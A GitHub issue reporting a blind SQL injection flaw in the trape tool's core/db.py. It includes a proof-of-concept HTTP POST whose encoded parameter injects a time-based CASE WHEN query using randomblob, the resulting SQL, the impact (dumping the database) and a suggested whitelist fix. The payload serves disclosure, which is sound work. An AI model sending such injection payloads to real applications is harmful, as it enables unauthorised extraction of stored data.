Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Blind SQL injection in core/db.py #168

Open
gaochua opened this issue Jun 14, 2019 · 0 comments

Comments

@gaochua
Copy link

commented Jun 14, 2019

Description

User input is not escaped when building SQL command. As a result, the application is vulnerable to SQL injection attack.

Proof of concept

  1. python trape.py --url example.com --port 8080
  2. Send the following HTTP request
POST /bs HTTP/1.1
Host: <trape_url>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 287
Connection: close
Referer: <victim_url>

id=0&t=time_d%20%3D%20case%20when%20(SELECT%20count(tbl_name)%20FROM%20sqlite_master%20WHERE%20type%3D%27table%27%20and%20tbl_name%20NOT%20like%20%27sqlite_%25%27)%20%3D8%20%20then%20randomblob(1000000000)%20else%201%20end%20where%201%3D1%20or%201%3D%3F%20or%20%27a%27%3D%3F%20--&d=0
  1. The final SQL query is:
update victims_battery set time_d = case when (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') = 8 then randomblob(1000000000) else 1 end where 1=1 or 1=? or 'a'=? --
  1. If the condition inside case when() is true, randomblob(1000000000) is executed, which leads to large delay and/or returned status code of 500. This enable attacker to run a blind SQL injection attack.

Impact

Dump the whole database of trape.

How to fix

The vulnerability is in https://github.com/jofpin/trape/blob/master/core/db.py#L129. The data[2] variable is manually concatenated to the SQL command.
To fix this, developer can whitelist data[2] variable before constructing SQL query.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
1 participant
You can’t perform that action at this time.